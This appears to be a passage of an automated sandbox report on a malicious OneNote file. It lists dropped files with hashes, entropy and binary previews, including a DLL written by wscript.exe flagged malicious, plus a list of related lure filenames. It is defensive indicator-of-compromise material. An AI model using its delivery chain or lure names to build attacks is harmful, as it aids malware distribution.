                                                                                                        Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!.1.....AQ..aq.g..8...."r....2.FG..#.E..7.Rb..Cc..D.v.B..3s..$d.%5Uu..&6fW'w........................!....1Aa...d..5e.6.q...Q..."2b.c..r3DE..BRs4U.#C.S.T............?...u.&0...cV.T.I...1..=4....Ce_.g.q.=F.M:>)...k..pm..h..=........S....)Ja8x...b.).=5.q..0......k.M.....1?-.G.b&.5..Ep.8t...'...R)..ta.F$bXO]tW.b.6#.t.XWN..ZW......].....G....x&&f..'L.....7...\...'.8...~`.sa...............................................X........qo...SMk...'.V...i..hb.}&?/.k.:>l.^....>Y...<}...&.jY.Gn.MKejyV......D......gf.0....t.nw..XQ...H.B.....=8.UkR.....Hm..w..]...k...#Z...F../.gjWvf.....w.aZ].2..5..^...VZv..._.7..a.|...:.B...,f...............~....m.;_.....-.e.y.w.[m.].bu.b.f+.E++\.....Y..7
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):86187
                                                                                                        Entropy (8bit):7.951356272886186
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:AbmHwD7za0syWMetp3TdPFzoJamVdAQZCiUit9qbYN6LerhWMzIWgN1EeaYhJM:1QnzsyTeP3TPAdAQZCi5qbYEKrhWWMNO
                                                                                                        MD5:FEE4785DF76E93A9DC2F4501CBAEAE12
                                                                                                        SHA1:8FB4527BDE05EF208FCDB168098A07707C27501F
                                                                                                        SHA-256:F091DED5E283AF6848670A3172E7C43C6099875D39B3FC69C2BDBA914F609602
                                                                                                        SHA-512:7E99D33151A0D3873D6A819C98EA8E62D928C087B7BA2080F11C7BCF746AD60A44D4FF6EE3D2D2E8DFA4BF1FC6285ED56BB83F91C2FC6FC4FDFF2000105F10B1
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...........................................................................................1.!Aq...Qa."...2..BR#...br......6v.7..3.CSc...$4.s..&dt%u.f.......................!1.AQ..aq........"2.B#....Rb3..t.5u.67.8.r..$....C4.cs.Sd%.DEUe&.............?............w.....c.....i.A.....3...7.......7..P......%.........?Th..l./?.;.....$}..=5Oa...F.c.A/...D.D..]..y..3e.5\%.fo2.X.*]q.5Ee.}..i..md.T....#...-...Mu...9...-+..~w5O.);..G..'.;..).....A_...M.vV..y.q......,<.3.(...._K:..XM.......w.......9..T.......?b..a-%.c;.}..>....|.,lZKCEB.t...fw|.Sw^..Y..:.J.................t._P..v..j.1.R8.R....G..W*H<(Xi........i..xcu...WM.dqM>'W..g....M.q.....+.....b'..~....>..T.~Jc....fj.X.x..9...N.w.6:..>.......&.(h..u...t._...)_k#7Za...cZ....P...Y..;.V.,..xo.....f........Y...\6...M'L._
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 85 x 470, 8-bit colormap, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):11197
                                                                                                        Entropy (8bit):7.975073010774664
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:p9wNdtRKcVHso6zsqm06xaqZdingVzLZ7/PGSIz/yycRTbChh/JzhbEx15RGb:mdtMcVHqgAqTinMzLZ7/uSIz/yTR/mhF
                                                                                                        MD5:DDC3CC30794277500EFE4BC6667EC123
                                                                                                        SHA1:EFC9642C1F95B5FC38764476AE481649C016FA0C
                                                                                                        SHA-256:7F5B660A1A0BF46C75AAF19B4F77A0E086DE003EC03AFC1F58D871D55AA5BA9E
                                                                                                        SHA-512:25232A84604C3959634D33090238FEC8D51E40AD84EB3A08BB8522A81BE1E83378649C014E98E1DFCDF46B7BFAC92D8D2429211CD11D7EE0334C9C3DF7C1B6A6
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...U.........1x5.....PLTE....................................e........................................................s...............x..........................o..............................................................................................................................................................~.............................m...............................................j...............................................p.......z......................................................x..............|........................................v.......................y..........................................................h...........................................................................P..{....bKGD....H....cmPPJCmp0712....H.s...(SIDATx^.}i@S..N....h...!..)....AI%..p.L."a..)..`U..,h..:O.b.:.j+.Z).b..zN.s..{O...&|..N}...${....~.....k}.[k}{.o^.D_..W:35ly..7rL....6n0.A...b
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 88 x 574, 8-bit colormap, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):19920
                                                                                                        Entropy (8bit):7.987696084459766
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:DRSgtAxJx7bzvAsVSqQElOT4uHmpmvNYT9aPU+QtsC2LgfIqJZnbeyRB:DsgaN7bzvAsVdK4uGQFUZ6bU/p3
                                                                                                        MD5:1BDAD9B3B6DE549162F9567697389E1C
                                                                                                        SHA1:5D9C09159F07A3A9BDCC6C4B9BD9CB72D0184E6F
                                                                                                        SHA-256:0908A4CFA23F93011176D47F45843E9CA2973030421996E8E27484781F54B0EC
                                                                                                        SHA-512:475040779AC247BB5C3E11862FB55FBDDFA12D759EE86A33E11BC1F3B656D6CD0F9B25146C0113E43E1D8001D8867D3BC3BF7E6FE21F3A0016CB1F8B70B7A15A
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...X...>......y=h....PLTE..................................t........iw..............................................._n|...Tds...ky......................................................p~.....................................................dr.................v.............................................n{.......ap}..........x.....z...................u......................|..Vfu............r.....w........................................~...................Zjx...................................Yiw............w..|....................Xgv{.....y...........................jx..............\lz.........}..z.....t..[ky........u..y.....gu................................{..........}.....u....................~...........y....r.....bKGD....H....cmPPJCmp0712....H.s...JfIDATx^...\.W./.}....Sy...(..4....D.-.....H...% .$"D.Qr.......`..;...6...N......s...^...L.....Y{.GQU`..~...j....{...-Ax.K..&.....F..I\i..
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):179460
                                                                                                        Entropy (8bit):7.979020171518325
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3072:oiKXvL7lv0am/R1vrdH+9dK6zPQ6bbnGDpcGGDNMIOIMAT8q9Vc02Q57S4A+vMFz:+vlvC/HvgA6fGqGGJlO1qZ71W6CzDn
                                                                                                        MD5:4E131DBFEC5C2462273CA7B35675B9D9
                                                                                                        SHA1:CA037F444D819A118AC37D7AA3782B9BF94C1616
                                                                                                        SHA-256:2A4A3530D652E227DDD5ADC096A95F6034718F7C380B07DB622022D768815059
                                                                                                        SHA-512:C333ECEB1439D0238BF44FB7896E62DBA4C645B70413AA0F99C1F10E8DCD20C2EEE5C83F2E9DDE9A2494C85A6D8D13CFFFC4160E2F598E17867015F5244D656A
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!.1AQ.aq...".....2Rr..Bb..#34.....CSs.$5c.t....%.Dd.6.T..u.U....E.7w........................!.1A.Qaq......2."r.3....BRb.#4......CsSc...$.5..%.DT.t67d..Uu...'............?..c.......p..z..i.....z......kj........F>f......3N...M....RM.&..-.~.Q..'.....q.a..w...-~......g.{..&.......V.n.D....>FS!n.....@..)...W..q..Wr{..J.gf.{.M$.P@m.,..9..&m.D...w.._...-.O........s.....h.k~......(.K...V..l.-...+.9.k......*......#.p#.O..9M..mF...C.......7+.AI....4vw.;..H......e..Q.u[.eUK.....z.....[.Kt...s..Lf.4..l{.....sh.............=..;..iqkj.m.a...NH......v..H..$..q.y......c...U[Mcf.......+...S-...^....4..T..YtL.x.v.;.....<...Ik|B.$.s8......3.+.8.l.. h.:....%B..W..I.QRS..,*x.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):109698
                                                                                                        Entropy (8bit):7.954100577911302
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3072:rDlmvIWr0aRtNCfShCWBxyCHMlcVG0Ezy4FR:rDliIfot8ahCWBcCHDVwR
                                                                                                        MD5:8D804A60E86627383BED6280ED62F1CF
                                                                                                        SHA1:E23FF14B10AD0762DD67FBA3CD6EFC85647C0384
                                                                                                        SHA-256:494547E566FB7A63DD429EB0699FE41AA8998F8EA2F758D813FE3D56C3075719
                                                                                                        SHA-512:0FB19F3D00159F2748C3A54E952E551B9FEA6910D67A54DECA8D099992E50383EADB92768FF1F75CFFAE82A7A157B1E0F77A2F0BE7EC64FD2324304FDCA46577
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...............................................................................................!"#.123..AQB$..aq.RCS...b..c4%..rs..D&....5E6'..TdUte...u.....FV...7.......................!"..1A2B..QaqR.#.br3.........C%...$5.....c4U..Eeu&SsD.6T..................?.....O.C.....^..R<A.g...[....3.....r.0.....nX.S....}...[.?Z.....A.?..~~I..rY|N.o...9......!...o7r../-.y...'5.3.U.s".-.0.1......SS...&.Q.j.*.$m.e..:x....`}...EP.?.7..~G(so.......O.....z.N..<....~^a.e...........p9.?<._..|......~.<@.D.9..G..?.?z.y?z.C.U.w..[.,..A.+........s......g...G.^....pz.xY.....d8.y.X...P..O(A.O..~:._.......<...o..4s..^.^b..x......_a.....|{c...:..X.....}.._...[?..NK.c...}.<......H.G....+x.Z..|....n...o....`.nk.#.%x......-|...|7......N!=././..w.8x.".8....'x........w...,>....j[w8a..}..lS..?.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):41893
                                                                                                        Entropy (8bit):7.52654558351485
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:pZvVQkUbOHxx3pvVmO5rsP5gUdXwFMuv53knzyncaXgRDqPU:pZkijV5wScXwFMYknzucaXgRyU
                                                                                                        MD5:F25427EFECFEE786D5A9F630726DD140
                                                                                                        SHA1:BC612A86FF985AB569ED1A1EA5FFC4FDB18FC605
                                                                                                        SHA-256:5A36960DF32817E8426BD40A88F88B04FB55B84BAEF60F1E71E0872217FDB134
                                                                                                        SHA-512:B102F34385196D630F198667E874F25ADBC737426FDAE0747EC799B33632E5DC92999C7C715DC84D904342738930267AB1709870BDAA842243E4C283FE5E1554
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...........................................................................................!.1AQ....aq......"......2...Xx..9BRr#.b3$..&..g.8....%F'G.(H.Ss..D5E..v..W..Cc.deu..7w.h.).....................!.1....A..Qaq...Ttu.6..."R..5...2B..S....bcs.Dd%&r3C...#$...Ue.............?..R...%.R...t.MQ*.l...v...V]..n...Zw....M....4..F.&&bb0.:]l......ay.r<..3.l.Q^.........I54.N2.8..2s...w..r6.......[1Zh....O...9..>...B......x]...r.\.\..v..~....y.QT.3.......=....r..}.l.....o;....M..C1....w)...+o1f.]...MoA.E..s5..i.\....miGsy..m\.Zj....I'YU.\tU6La5v.>.K..m.]1.......k..0....</5v.V7lY.e.vV.+./[....f..u{....s.}.Rb.Z.....Y.6]..m....V.\...Mr.=r...K...l..%..m^.......X.(..fG..[F*ly.jL.a4..vs..o.e..q.9km..w1.yg.....r_.*h.n..5i.-.{Y.l...<...'Or.s..Z....../JP.....\FV.S..............m
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:05:55], progressive, precision 8, 612x618, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):68633
                                                                                                        Entropy (8bit):7.709776384921022
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:tapXpSTJDOkFGdJdBk/slsbfsw1imaapnbvD8:U2OjJr6b07m1bvD8
                                                                                                        MD5:41241EE59AB7BC9EB34784E3BCE31CB4
                                                                                                        SHA1:98680761A51E9199CF3C89F68B5309FBEC7EE3CB
                                                                                                        SHA-256:035B26DF61855A3F36DBD30FDAB0C157C04C9E8AE2197EA4D4AEB3E82E6A4C2B
                                                                                                        SHA-512:3EE331D5BCEE4AD5D3FC9661D4AB4053F7D351591A094334F963C33C9D0E32CCCABE9334AD7C308108CE99617E064FE848DCD469ACD8D83FBE5C4452DE523D8F
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:05:55.............................d...........j...........................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?../$.W:SZ./...9.....-...u......r.....].c...@W_.7...+......v.+PD.I..-<1.pDn-\.....p.$....0.}V....\..>.~..XN.o..l(E....ik..o.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:08:07], baseline, precision 8, 595x450, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):59832
                                                                                                        Entropy (8bit):7.308211468398169
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:HS9SYFtN0+CRa9mfJy4zBAiIJhzrkHDV2hJK:yAmta+Tyy4zBIJW5WK
                                                                                                        MD5:DCDD543A4E0BA2C1909BA095D46FFBCB
                                                                                                        SHA1:B86C89537138FE07255354202D3EAD0B53B3C54D
                                                                                                        SHA-256:28F334B77068F71F5F92A95695433B950610204A0E5580CE567DB8FAD4993ECB
                                                                                                        SHA-512:5408C3259B7F3288A4BEB04342799AD5FE3A6F0EC7E92353B29B7E7E538DFA9903B39637226919E0421BC422635D25F5F8069DC7441864DC03E1B909BF5C2C84
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....H.H.....fExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:08:07.............................S.......................................................&.(.................................0.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d.................................................................................................................................................y...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?......;R~+'....xh..~.n-}.......Te................^B..IU_....._...S......h.......!....9...A}6V=J......C..c.....Ug.Wh......
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                        Category:modified
                                                                                                        Size (bytes):53259
                                                                                                        Entropy (8bit):7.651662052139301
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:dCiCBBenRYWDBCipMYGTbYGLHbXxoP/qEF+MU50qyJ30h2W474S/Aq/xc4674bi5:dCiIQXBCiwbDLHD0/sFyVel4Pi4UgE
                                                                                                        MD5:2EE369ABB7936F8C28FF0ABDD224EA05
                                                                                                        SHA1:FE9D304A7B49E31EAE439369ABC548E265149636
                                                                                                        SHA-256:FB12D59B8BE911247BBAFDD416852E8B74B028005A141CB4DBBBA109B4B6ED2C
                                                                                                        SHA-512:5CF396CA472C32AE988600176114106CB1619404DD899A3867A5AB43DC90583B771EF69B14EF50E56A21F038BF51D8463C6ADD2DE9D4CB523F6290E24A4DECB3
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!1..AQa....q........"2..R..Bbr..#S....3$.....C.4v..(X.DtEUV.....cs..Td.5uf'Wgw8Hh........................!1Q.Aa....q.2...."R...r..3.t..U...B#S.4ub..C$d.5Ee&'7c.D%sT..............?.....?...k,lk^...M".Yo5.Qp.&s}b.m.:...W.x}.*.a......N1..d-n.-..^..b..TZ.W..."....F....^......ve5...^...2.:i...........~u2pK.z./&..u..L[I....Y....@y{|>..MN=:....Q[..H....a........|%..4fV....).....^.9b.f...F...p.=.W...aZ.........Z.t.n.....z3..[..lVh..\.N-.._.sK.y.._e.G.jig.a.7^....u...*.p.5.a.].........u/u..D.yl.XA..f.z..~.x.....N.....b=.uv.2.t.'.N.-.H..n.v.a.A[.Z.....T2...._...:....h..l.E..sm..a.3I...RE...fWb.Ek.0.#.)..Y#T...........u{....U....s.].7_H.2.`O6...P......}..4LR....]4.mid...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):362512
                                                                                                        Entropy (8bit):7.486503538737249
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6144:AyHwh4AIZ5A1QM6vUbHCkCBVoqx5HUvFOAjNPySj8MTcrOQMhuNBSMl:EWZ5A10vUbikCBVoqx5wOuqSJTcOQMZE
                                                                                                        MD5:49F58DC967BAF4023C670D3A508293A2
                                                                                                        SHA1:D3B5D8FD97C7B1463E3171DB96DC5D5E2E3C7326
                                                                                                        SHA-256:92892449090D4ADEEFD2A1CCB129F5A93AF08ED8C04032B11C2E8CFDDFC47256
                                                                                                        SHA-512:93167E6919A7805931091F82F2F61784A55ECC44D31437F240340BABF8B7CB22A3F9CBD6767F3A09828C0E563CD29E1B780654B39CF710A5B819A971F14A7A48
                                                                                                        Malicious:false
                                                                                                        Preview:.R\{..M..Sx.)...YC.B.I.HxK=...................?.....I.......*...*...*...*....................................................bD..{.K.@$.gN..d(.x...........(~......................8.......0......................R...J.y]..CM.w........@.....E..&.K..0............................U....7..U....7..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):5136
                                                                                                        Entropy (8bit):2.781811634714446
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:YxQYyfEa/uZervY+meHviIklaW//Uc89wTT5mBmlthbXyzwIJyTCjnp4Lrac8llm:xnT/uIPv4om1mAlthbXkIac0oac3
                                                                                                        MD5:61D23686FED67BEC2977CEAB86EC98DE
                                                                                                        SHA1:3C400466DAF4570C4D7CBF680FB0D9DC0A22D434
                                                                                                        SHA-256:CE2FC37B3D3EFF156BB07FA231DE2899C1EF3C00611064D9EA0C116353B4A290
                                                                                                        SHA-512:8844B3CA8C43CFEDB8152DED6EEC01C1545CC71EE36C67CFF3EEB3BD7123C7C073C4948E0BC35B886E01DDE119583CA17FEE20001DA86FF72191F3DA45C420D6
                                                                                                        Malicious:false
                                                                                                        Preview:./.C..vL....W"v_.bD..{.K.@$.gN.................?.....I...........................................................................................................................................................6r...|.F..... j.........[_n.r..M.moC.d].............................r....7..r....7..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):16384
                                                                                                        Entropy (8bit):0.3269895845442555
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:UPQWbUl/T+t+Wpys5UMclSqlPMclX/7E1vq/tXb+lh2RKUEZ+lX1MAx7vKlCXlvZ:UooZLys2xX/7E1vwb+6RKQ137v+uIC
                                                                                                        MD5:3A537554C3708D0C19C15CFD48893F08
                                                                                                        SHA1:383B2451BF728AA253E96DA58980A697B59B380F
                                                                                                        SHA-256:DE91363F8B329261E5CBBE000262B13D37A9F88F96ADA9C81534E09E1FC83A56
                                                                                                        SHA-512:71CB6B545215C22589FE3965B452BDC0CF16B1EBDDDAC3EA9945B5A37280B1CD98763C35CF2B9F37DD6BBB4DC867139EC354622FD109724908397DAE0269CA53
                                                                                                        Malicious:false
                                                                                                        Preview:.@..`...........................................`........................................................@.......B..............Zb..........................................@.t.z.r.e.s...d.l.l.,.-.3.2.2.......................................................@.t.z.r.e.s...d.l.l.,.-.3.2.1...........................................................M...f..... .......Q.X..........O.n.e.N.o.t.e. .W.a.t.s.o.n. .L.o.g...C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.O.n.e.N.o.t.e.1.5.W.a.t.s.o.n.L.o.g...e.t.l.......P.P.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):9
                                                                                                        Entropy (8bit):2.94770277922009
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:tWn:tWn
                                                                                                        MD5:07F5A0CFFD9B2616EA44FB90CCC04480
                                                                                                        SHA1:641B12C5FFA1A31BC367390E34D441A9CE1958EE
                                                                                                        SHA-256:A0430A038E7D879375C9CA5BF94CB440A3B9A002712118A7BCCC1FF82F1EA896
                                                                                                        SHA-512:09E7488C138DEAD45343A79AD0CB37036C5444606CDFD8AA859EE70227A96964376A17F07E03D0FC353708CA9AAF979ABF8BC917E6C2D005A0052575E074F531
                                                                                                        Malicious:true
                                                                                                        Preview:badum tss
                                                                                                        Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):316928
                                                                                                        Entropy (8bit):7.337848702590508
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6144:cwNQMQTlfdUPABVy559hhR3iP7TfPYbrF1EFVw0todxKROsCt:rNbadDBkZ6rPeEFizdxxsCt
                                                                                                        MD5:BFC060937DC90B273ECCB6825145F298
                                                                                                        SHA1:C156C00C7E918F0CB7363614FB1F177C90D8108A
                                                                                                        SHA-256:2F39C2879989DDD7F9ECF52B6232598E5595F8BF367846FF188C9DFBF1251253
                                                                                                        SHA-512:CC1FEE19314B0A0F9E292FA84F6E98F087033D77DB937848DDA1DA0C88F49997866CBA5465DF04BF929B810B42FDB81481341064C4565C9B6272FA7F3B473AC5
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: ReversingLabs, Detection: 58%
                                                                                                        Joe Sandbox View:
                                                                                                        • Filename: MBQ24253060297767042_202303161424.one, Detection: malicious, Browse
                                                                                                        • Filename: iMedPub_LTD_4.one, Detection: malicious, Browse
                                                                                                        • Filename: iMedPub_LTD_6.one, Detection: malicious, Browse
                                                                                                        • Filename: INNOVINC.one, Detection: malicious, Browse
                                                                                                        • Filename: Insight_Medical_Publishing_2.one, Detection: malicious, Browse
                                                                                                        • Filename: Insight_Medical_Publishing_1.one, Detection: malicious, Browse
                                                                                                        • Filename: Insight_Medical_Publishing_3.one, Detection: malicious, Browse
                                                                                                        • Filename: Insight_Medical_Publishing_4.one, Detection: malicious, Browse
                                                                                                        • Filename: OMICS_Online_1.one, Detection: malicious, Browse
                                                                                                        • Filename: Insight_Medical_Publishing.one, Detection: malicious, Browse
                                                                                                        • Filename: Omics_Journal.one, Detection: malicious, Browse
                                                                                                        • Filename: OMICS.one, Detection: malicious, Browse
                                                                                                        • Filename: OPAST_GROUP_1.one, Detection: malicious, Browse
                                                                                                        • Filename: OPAST_GROUP_LLC.one, Detection: malicious, Browse
                                                                                                        • Filename: OPAST_GROUP.one, Detection: malicious, Browse
                                                                                                        • Filename: Opast_International.one, Detection: malicious, Browse
                                                                                                        • Filename: opastonline.com.one, Detection: malicious, Browse
                                                                                                        • Filename: Opast_Publishing_Group_1.one, Detection: malicious, Browse
                                                                                                        • Filename: Opast_Publishing_Group.one, Detection: malicious, Browse
                                                                                                        • Filename: omicsonline.net.one, Detection: malicious, Browse
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L`.=...n...n...nCy.o...nCy.o...nCy.o...n.z.o(..n.z.o...n.z.o...nCy.o...n...nq..n.z.o...n.z.o...n.zsn...n...n...n.z.o...nRich...n................PE..d....6.d.........." ...!.F...................................................0............ .............................................T...d...d....`..(....0............... ..........8...........................p...@............`..`............................text....D.......F.................. ..`.rdata.......`.......J..............@..@.data...............................@....pdata.......0......................@..@_RDATA..\....P......................@..@.rsrc...(....`......................@..@.reloc....... ......................@..B........................................................................................................................................................................................
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3679
                                                                                                        Entropy (8bit):7.931319059366604
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                        MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                        SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                        SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                        SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4847
                                                                                                        Entropy (8bit):7.950192613458318
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                        MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                        SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                        SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                        SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                        Malicious:false
